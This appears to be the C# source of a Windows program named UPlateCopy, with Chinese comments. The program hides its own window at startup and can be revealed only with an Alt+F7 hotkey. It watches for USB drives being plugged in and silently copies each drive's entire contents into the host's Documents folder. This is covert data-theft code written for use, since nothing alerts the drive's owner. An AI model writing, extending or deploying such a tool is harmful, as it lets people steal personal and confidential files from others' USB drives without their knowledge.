﻿using System;
using System.IO;
using System.Windows.Forms;

namespace UPlateCopy
{
    public partial class Load : Form
    {
        public Load()
        {
            InitializeComponent();
        }

        private void _Load(object sender, EventArgs e)//程序加载完成时
        {
            if (!File.Exists("Hide.ini")) File.AppendAllText("Hide.ini", "True");//判断文件是否存在如果不存在新建个{窗口隐藏配置文件}
            if (!File.Exists("File.ini")) File.AppendAllText("File.ini", Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments));//判断文件是否存在如果不存在新建个{复制目标路径配置文件}
            if (!File.Exists("Merge.ini")) File.AppendAllText("Merge.ini", "False");//判断文件是否存在如果不存在新建个{复制U盘时是否到放在同一个文件夹下配置文件}

            zgHotKey.RegisterHotKey(Handle, 1903, zgHotKey.KeyModifiers.Alt, Keys.F7);//注册全局热键
            try { if (Convert.ToBoolean(File.ReadAllText("Hide.ini"))) timer.Start(); } catch { }//启动时钟来隐藏界面
        }

        protected override void WndProc(ref Message m)//这个是监控U盘是否插入的事件
        {
            #region 监控全局热键

            const int WM_HOTKEY = 0x0312;
            //按快捷键
            switch (m.Msg)
            {
                case WM_HOTKEY:
                    switch (m.WParam.ToInt32())
                    {
                        case 1903:
                            new Main().ShowDialog();
                            break;
                    }
                    break;
            }

            #endregion 监控全局热键

            base.WndProc(ref m);

            #region 监控U盘插入事件

            try
            {
                var aa = UPiate.GetRemovableDrivers(ref m);
                if (aa == null || aa.Length < 1) return;

                var ds = string.Empty;
                for (int i = 0; i < aa.Length; i++) ds += aa[i] + Environment.NewLine;

                #region 插入U盘引发事件入口

                try
                {
                    string folder = DateTime.Now.ToString("yyyyMMddHHmmss");//用时间达到随机名称功能

                    #region 判断是否全部文件复制

                    try
                    {
                        if (Convert.ToBoolean(File.ReadAllText("Merge.ini")))//利用try catch防止报错
                            folder = @"Datas\" + zgFile.zgUPlateId(ds.Replace("\r\n", ""));//重新定义要复制到文件夹的名称
                    }
                    catch { }

                    #endregion 判断是否全部文件复制

                    zgFile.CopyDir(ds.Replace("\r\n", ""), File.ReadAllText("File.ini") + @"\" + folder);//执行复制
                    zgFile.DeleteNull(File.ReadAllText("File.ini") + @"\" + folder);//清理空文件夹
                }
                catch//程序自我修复,复制的文件路径
                {
                    File.Delete(@"File.ini");
                    File.AppendAllText("File.ini", Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments));
                }

                #endregion 插入U盘引发事件入口
            }
            catch { }

            #endregion 监控U盘插入事件
        }

        private void timer_Tick(object sender, EventArgs e)//时钟执行的事件
        {
            this.Hide();//程序不能直接隐藏,这里使用间接隐藏自己
            timer.Stop();//执行完这个方法之后直接停止时钟
        }

        private void Load_KeyDown(object sender, KeyEventArgs e)//快捷键
        {
            if (e.KeyCode == Keys.F6 || e.KeyCode == Keys.F7) Hide();//隐藏
            if (e.KeyCode == Keys.F7) { new Main().ShowDialog(); }//设置程序
        }
    }
}